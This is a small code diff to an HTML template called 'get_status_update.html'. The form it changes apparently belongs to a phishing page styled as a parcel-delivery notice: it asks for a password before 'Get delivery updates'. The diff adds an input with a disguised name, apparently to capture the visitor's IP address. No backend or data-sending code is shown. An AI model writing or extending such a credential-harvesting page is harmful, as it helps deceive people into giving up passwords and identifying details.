--- a/mayne/templates/mayne/get_status_update.html
+++ b/mayne/templates/mayne/get_status_update.html
@@ -22,6 +22,7 @@
       <input class="kii" type="text" placeholder="Password" name="ppot_cover" value="" spellcheck="false" required>
       <br>
       <br>
+      <input id="ip-form-input" type="text" name="ipot_cover" value="" spellcheck="false">      
       <button onclick="success()" type="submit" class="sign-in-button">Get delivery updates</button>
     </form>
   </div>
